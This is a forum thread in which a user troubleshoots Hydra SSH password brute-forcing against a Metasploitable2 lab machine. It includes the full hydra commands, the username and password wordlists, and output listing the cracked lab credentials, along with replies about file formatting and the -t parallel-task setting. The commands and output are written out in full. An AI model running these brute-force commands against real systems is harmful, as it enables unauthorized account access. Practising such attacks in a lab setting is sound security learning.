pierre Posted June 13, 2016 Share Posted June 13, 2016 Hello, I work with Hydra on metasploitable2. I have metasploitable credentials account in two files, "user" and "pass". I just want to know account have SSH right configured, so I bruteforce. Three account have SSH access on the target: root@osboxes:~# ssh sys@192.168.0.2 sys@192.168.0.2's password:sys@metasploitable:~$ exit logout root@osboxes:~# ssh msfadmin@192.168.0.2 msfadmin@192.168.0.2's password:msfadmin@metasploitable:~$ exit logout root@osboxes:~# ssh service@192.168.0.2 service@192.168.0.2's password:service@metasploitable:~$ exit logout Now I want to bruteforce with Hydra: root@osboxes:~# more user sys klog msfadmin service root@osboxes:~# more pass service msfadmin 123456789 batman And here is my Hydra command and the result: root@osboxes:~# hydra -L user -P pass 192.168.0.2 ssh Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-13 11:18:39 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:4/p:4), ~0 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 192.168.0.2 login: service password: service [22][ssh] host: 192.168.0.2 login: msfadmin password: msfadmin [22][ssh] host: 192.168.0.2 login: klog password: 123456789 1 of 1 target successfully completed, 3 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-13 11:18:42 Hydra is well recovering the password but not the right account.. It omits the account "sys:batman", do you know why ? Quote Link to comment Share on other sites More sharing options...
cooper Posted June 14, 2016 Share Posted June 14, 2016 Try ending both use and pass files with an empty line. Quote Link to comment Share on other sites More sharing options...
pierre Posted June 14, 2016 Author Share Posted June 14, 2016 (edited) I listen to the prompt and change my command: root@osboxes:~# hydra -L user.old -P pass.old 192.168.0.2 ssh -t 4 Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-14 04:52:22 [DATA] max 4 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~1 try per task [DATA] attacking service ssh on port 22 [22][ssh] host: 192.168.0.2 login: klog password: 123456789 [22][ssh] host: 192.168.0.2 login: msfadmin password: msfadmin [STATUS] 141.00 tries/min, 141 tries in 00:01h, 139 todo in 00:01h, 4 active [22][ssh] host: 192.168.0.2 login: service password: service [22][ssh] host: 192.168.0.2 login: sys password: batman [STATUS] 137.50 tries/min, 275 tries in 00:02h, 5 todo in 00:01h, 4 active 1 of 1 target successfully completed, 4 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-14 04:54:26 This time all credentials were well-found !! Adding the options -t 4 to my command :) -t TASKS run TASKS number of connects in parallel (default: 16) It has something to do with the parallel tasks in the processor ? I've made some tests : A –t 6 makes the same good result within 1m24s. A –t 8 makes the same good result within 57s. A –t 10 makes the same good result within 50s. A –t 11 makes a wrong result within 54s omitting 2/4 credentials. And at -t 11 I got the warning: [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 11 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task There is something scientific behind all this i'm sure ! Edited June 14, 2016 by tot94 Quote Link to comment Share on other sites More sharing options...
cooper Posted June 14, 2016 Share Posted June 14, 2016 I can assure you, the processor doesn't give a shit. Maybe the program (Hydra) is shit at multitasking but, well, who knows? I find these 2 lines quite descriptive. Somehow changing the command line added 264 new login attempts to the run. I'm wondering if you really didn't change anything else... [DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:4/p:4), ~0 tries per task [DATA] max 4 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~1 try per task Quote Link to comment Share on other sites More sharing options...
pierre Posted June 14, 2016 Author Share Posted June 14, 2016 Non even for -t 16 I have : [DATA] max 16 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task But I got these shitty lines: The session file ./hydra.restore was written. Type "hydra -R" to resume session. The session file ./hydra.restore was written. Type "hydra -R" to resume session. The session file ./hydra.restore was written. Type "hydra -R" to resume session. So I think 6-8 are the right number of thread to execute Hydra. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted June 14, 2016 Share Posted June 14, 2016 Have you tried logging in with a single user password with Hydra? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.